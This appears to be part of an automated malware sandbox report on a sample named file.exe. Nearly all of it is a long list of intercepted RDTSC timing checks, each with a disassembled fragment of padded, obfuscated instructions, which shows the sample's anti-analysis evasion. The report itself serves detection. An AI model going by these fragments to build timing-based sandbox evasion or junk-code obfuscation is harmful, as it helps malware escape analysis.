00007F74491B01E1h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03388 second address: A0338D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0449A second address: A0449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0552B second address: A05531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A05531 second address: A05535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A045C4 second address: A04668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A003h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F7448D3A001h 0x00000010 jmp 00007F7448D39FFBh 0x00000015 nop 0x00000016 sub dword ptr [ebp+12450886h], eax 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F7448D39FF8h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 movzx ebx, di 0x00000047 mov eax, dword ptr [ebp+122D1161h] 0x0000004d mov bx, 56FCh 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push edx 0x00000056 call 00007F7448D39FF8h 0x0000005b pop edx 0x0000005c mov dword ptr [esp+04h], edx 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc edx 0x00000069 push edx 0x0000006a ret 0x0000006b pop edx 0x0000006c ret 0x0000006d or dword ptr [ebp+122D297Ch], edi 0x00000073 mov edi, dword ptr [ebp+12448C5Bh] 0x00000079 nop 0x0000007a push eax 0x0000007b push edx 0x0000007c jns 00007F7448D39FF8h 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A055CF second address: A055D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A09263 second address: A09267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0578B second address: A0578F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0D3FC second address: A0D400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A0D400 second address: A0D406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10C41 second address: A10C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10C46 second address: A10C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10C5F second address: A10C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F7448D39FF6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10C6C second address: A10C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10C70 second address: A10C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12FED second address: A12FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12FF3 second address: A12FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12FF7 second address: A1300D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F74491B01D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9AC0D5 second address: 9AC0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9AC0DE second address: 9AC0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A171FE second address: A1720B instructions: 0x00000000 rdtsc 0x00000002 js 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1720B second address: A17211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17211 second address: A1721C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7448D39FF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1721C second address: A17222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17222 second address: A17226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17226 second address: A1722C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9AA6F5 second address: 9AA6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9AA6F9 second address: 9AA701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9AA701 second address: 9AA70F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7448D39FF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9AA70F second address: 9AA715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A184F2 second address: A1850D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F7448D39FF8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jng 00007F7448D3A004h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1850D second address: A18511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A18630 second address: A18662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F7448D3A00Eh 0x0000000f jmp 00007F7448D3A008h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A18662 second address: A18667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A18667 second address: A18671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A18671 second address: A186A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jp 00007F74491B01EEh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F74491B01DCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A186A7 second address: A186AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A186AB second address: A186B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D24D1 second address: 9D24E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F7448D39FF6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1D509 second address: A1D524 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F74491B01DFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1D524 second address: A1D528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1D528 second address: A1D54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F74491B01DDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F74491B01D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1D54A second address: A1D550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1D550 second address: A1D567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1D567 second address: A1D56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1D56D second address: A1D571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1DC0C second address: A1DC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1DC10 second address: A1DC6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F74491B01E3h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007F74491B01E7h 0x00000017 jmp 00007F74491B01E9h 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1DC6D second address: A1DC77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1DDDC second address: A1DDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1E2E6 second address: A1E2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1E2EB second address: A1E2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1E2F1 second address: A1E341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F7448D39FFCh 0x0000000e jbe 00007F7448D39FF6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F7448D3A003h 0x0000001e jg 00007F7448D39FF6h 0x00000024 jmp 00007F7448D3A000h 0x00000029 popad 0x0000002a pushad 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d jns 00007F7448D39FF6h 0x00000033 pushad 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1E341 second address: A1E346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1E5F9 second address: A1E5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1E5FD second address: A1E60F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A21C25 second address: A21C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E89AC second address: 9E89B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E8E45 second address: 9E8E57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F7448D39FFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E8E57 second address: 9E8E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E92D1 second address: 9E92E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7448D3A001h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E95A9 second address: 9E95BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E99D5 second address: 9E9A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+122D2CB5h] 0x00000011 pop edx 0x00000012 lea eax, dword ptr [ebp+1247A4A6h] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F7448D39FF8h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov dword ptr [ebp+122DB5E3h], edx 0x00000038 nop 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F7448D3A007h 0x00000040 jne 00007F7448D39FF6h 0x00000046 popad 0x00000047 pushad 0x00000048 jng 00007F7448D39FF6h 0x0000004e push esi 0x0000004f pop esi 0x00000050 popad 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F7448D39FFFh 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E9A67 second address: 9D30EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b jmp 00007F74491B01E6h 0x00000010 movsx edi, dx 0x00000013 popad 0x00000014 call dword ptr [ebp+1244CBF6h] 0x0000001a je 00007F74491B01FFh 0x00000020 push eax 0x00000021 jo 00007F74491B01D6h 0x00000027 pop eax 0x00000028 jng 00007F74491B01F1h 0x0000002e pushad 0x0000002f popad 0x00000030 jmp 00007F74491B01E9h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F74491B01E5h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D30EF second address: 9D30F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D30F3 second address: 9D30F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A21F66 second address: A21F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A21F6A second address: A21F8A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F74491B01E7h 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2265B second address: A22661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A227CC second address: A227FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F74491B01E7h 0x0000000b push ebx 0x0000000c jmp 00007F74491B01DBh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007F74491B01D6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A227FF second address: A22803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A26162 second address: A2618C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F74491B01DDh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jmp 00007F74491B01E1h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2B444 second address: A2B449 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2B592 second address: A2B59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2B834 second address: A2B83E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7448D39FF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2B83E second address: A2B856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F74491B01DEh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2B9E8 second address: A2BA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A006h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2BA02 second address: A2BA06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2AFE0 second address: A2AFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2AFE7 second address: A2B03E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F74491B01D6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jmp 00007F74491B01E8h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jp 00007F74491B01DEh 0x0000001a jng 00007F74491B01DCh 0x00000020 jmp 00007F74491B01E3h 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2FE07 second address: A2FE0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A3578A second address: A357B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F74491B01F1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0641 second address: 9A0667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7448D3A004h 0x0000000e push edx 0x0000000f pop edx 0x00000010 je 00007F7448D39FF6h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0667 second address: 9A0680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A34665 second address: A34669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A34669 second address: A34675 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F74491B01D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A34F65 second address: A34F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A38A6A second address: A38A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E3h 0x00000009 pop edx 0x0000000a jg 00007F74491B01D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F74491B01D6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A7162 second address: 9A717D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A005h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A717D second address: 9A71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F74491B01D6h 0x0000000d jmp 00007F74491B01E9h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A382D7 second address: A382E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A382E1 second address: A382EF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A382EF second address: A382F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A3AF15 second address: A3AF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A3AA65 second address: A3AA6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
